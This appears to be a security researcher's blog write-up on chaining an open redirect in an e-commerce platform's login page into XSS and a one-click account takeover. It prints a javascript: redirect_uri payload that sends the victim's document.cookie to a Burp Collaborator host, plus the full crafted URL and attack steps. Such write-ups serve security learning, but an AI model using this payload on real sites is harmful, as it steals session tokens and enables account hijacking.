From Open Redirect to 1-Click Account Takeover

From Open Redirect to 1-Click Account Takeover

Hi everyone, I hope you're doing well. In this article, I will share my findings on how I escalated an Open Redirect vulnerability to a 1-click account takeover.

Target

The target is an online platform designed to assist businesses in managing their e-commerce operations more efficiently. It offers a suite of tools and services aimed at streamlining various aspects of online business management, including inventory management, order processing, product listing, and multi-channel integration. Hereare some key features on the target:

  1. Inventory Management: Provides tools to manage inventory across multiple e-commerce platforms from a single dashboard. This helps businesses keep track of stock levels, avoid overselling, and streamline restocking processes.

  2. Order Management: The platform allows businesses to handle orders from various sales channels in one place, simplifying the process of tracking and fulfilling orders.

  3. Multi-Channel Integration: Supports integration with multiple e-commerce platforms and marketplaces, such as Shopee, Lazada, Tokopedia, and others. This enables businesses to manage all their sales channels from one centralized system.

  4. Product Listing Management: Users can create and manage product listings across different marketplaces, ensuring consistency and saving time on manual updates.

  5. Analytics and Reporting: The platform offers analytics and reporting tools to provide insights into sales performance, inventory levels, and other key metrics, helping businesses make informed decisions.

  6. Automated Processes: Automates various tasks such as updating stock levels, synchronizing product information, and processing orders, which helps reduce manual effort and the risk of errors.

Overall, the target aims to simplify e-commerce management for businesses, allowing them to focus more on growth and customer satisfaction by handling the complexities of operating across multiple online platforms.

The Vulnerability

To access the app, users must log in, which led me to this URL endpoint: https://accounts.target.com/?country=ID&from=OFFICIAL_SITE&language=id&redirect_uri=. This URL appeared when clicking the login button.

I suspected there might be an Open Redirect vulnerability, allowing redirection of users to a malicious website. The website was indeed vulnerable to this. However, I wanted to increase the impact, so I tested for an XSS vulnerability using the payload javascript:alert(1);. The website was also vulnerable to XSS attacks. Interesting!

Escalating the Attack

The website used an Authorization Header for account access. Inside the cookies, I found that the iam_token value was the same as the Authorization header, indicating that the cookie authorized access to the account. I created an XSS payload to steal the cookie:

javascript:window.location.href='http://xxxxxxxxxxx.burpcollaborator.net/?'+document.cookie;

So, the final payload looked like this:

https://accounts.target.com/?country=ID&from=OFFICIAL_SITE&language=id&redirect_uri=javascript:window.location.href='http://xxxxxxxxxxxxx.burpcollaborator.net/?'+document.cookie;&system_id=SYS_ERP

Proof of Concept (PoC):

  1. I sent this malicious URL endpoint to the victim

  2. The victim logged into their account

  3. The XSS payload was executed

  4. The cookies appeared on my server

  5. I used those cookies to log into the victim's account

  6. This resulted in a 1-click account takeover.

The bug has been reported to the company, but there has been no response from them. I hope you found this informative. Keep learning and stay silent.

You can buy me a coffee if you want to: Buy Me a Coffee